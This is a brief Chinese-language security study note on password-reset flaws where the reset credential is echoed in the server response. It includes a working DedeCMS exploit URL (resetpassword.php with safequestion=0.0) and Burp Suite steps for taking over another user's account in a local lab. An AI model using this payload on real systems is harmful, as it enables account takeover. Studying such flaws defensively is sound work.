0x00:简介
验证凭证回传:重置密码时,凭证为发送到手机上的验证码,但是在通过拦截发送验证码请求对应的Response包时,发现验证码在Response包中
重点:注意是凭证,有时候可能返回包里,凭证可能在cookie里面,或者也有可能在其他地方。
特例:dedecms任意密码重置
解决方案:修改包的返回规则
0x01:漏洞测试
注册用户user1 user2
Payload 1
http://192.168.2.137:8030/member/resetpassword.php?dopost=safequestion&safequestion=0.0&safeanswer=&id=2
访问payload1,burp suite抓包
请求响应中,有返回凭证,访问该链接
可以修改其他用户密码
